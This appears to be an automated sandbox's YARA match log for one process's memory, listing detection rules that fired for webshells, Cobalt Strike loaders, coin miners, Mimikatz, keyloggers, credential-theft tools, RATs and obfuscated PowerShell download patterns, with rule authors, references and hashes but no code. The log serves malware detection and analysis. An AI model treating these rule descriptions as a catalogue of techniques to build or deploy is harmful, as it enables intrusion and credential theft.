Source: 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6341599132.00000197A3621000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000024.00000003.6351629812.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000024.00000003.6350988033.00000197A3FA2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6304560058.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_MAL_Sandworm_Exaramel_Configuration_Key author = FR/ANSSI/SDO, description = Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PUA_CryptoMiner_Jan19_1 date = 2019-01-31, hash1 = ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05, author = Florian Roth, description = Detects Crypto Miner strings, reference = Internal Research
Source: 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_IEX_Download_Combo date = 2018-10-04, hash1 = 13297f64a5f4dd9b08922c18ab100d3a3e6fdeab82f60a4653ab975b8ce393d5, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6322218555.00000197A3016000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: REDLEAVES_CoreImplant_UniqueStrings author = USG, description = Strings identifying the core REDLEAVES RAT in its deobfuscated state, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Certutil_Decode_OR_Download author = Florian Roth, description = Certutil Decode, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2017-08-29
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ham_backdoor author = Cylance Spear Team, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: malware_red_leaves_generic sha256 = 2e1f902de32b999642bb09e995082c37a024f320c683848edadaf2db8e322c3c, author = David Cannings, description = Red Leaves malware, related to APT10
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_base64_encoded_payloads date = 2021/01/07, author = Arnim Rupp, description = php webshell containing base64 encoded payload, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 88d0d4696c9cb2d37d16e330e236cb37cfaec4cd
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_known_webshell date = 2021/01/09, author = Arnim Rupp, description = Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 7b6471774d14510cf6fa312a496eed72b614f6fc
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Cobaltbaltstrike_Payload_Encoded author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_obfuscated_encoding date = 2021/04/18, author = Arnim Rupp, description = PHP webshell obfuscated by encoding, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6282540905.00000197A4590000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_Samples description = Hacktool, score =
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Trojan_Win32_PlaKeylog_B author = Microsoft, description = Keylogger component, activity_group = Platinum, version = 1.0, unpacked_sample_sha1 = 6a1412daaa9bdc553689537df0a004d44f8a45fd, last_modified = 2016-04-12, original_sample_sha1 = 0096a3e0c97b85ca75164f48230ae530c94a2b77
Source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY	Matched rule: DeepPanda_htran_exe date = 2015/02/08, author = Florian Roth, description = Hack Deep Panda - htran-exe, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 38e21f0b87b3052b536408fdf59185f8b3d210b9
Source: 00000024.00000003.6331669561.00000197A4068000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6289584259.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HackTool_MSIL_SharPersist_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 98ecf58d48a3eae43899b45cec0fc6b7
Source: 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6356061064.00000197A47A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_generic date = 2021/01/14, author = Arnim Rupp, description = php webshell having some kind of input and some kind of payload. restricted to small files or big ones inclusing suspicious strings, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6431307677.00000197A4B7D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6316141195.00000197A4068000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ammyy_Admin_AA_v3 date = 2014/12/22, hash2 = 07539abb2623fe24b9a05e240f675fa2d15268cb, author = Florian Roth, description = Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, reference = http://goo.gl/gkAg2E, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = b130611c92788337c4f6bb9e9454ff06eb409166
Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScriptShell_Case_Anomaly date = 2017-09-11, author = Florian Roth, description = Detects obfuscated wscript.shell commands, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: vanquish_2 author = Yara Bulk Rule Generator by Florian Roth, description = Webshells Auto-generated - file vanquish.exe, hash = 2dcb9055785a2ee01567f52b5a62b071
Source: 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp, type: MEMORY	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
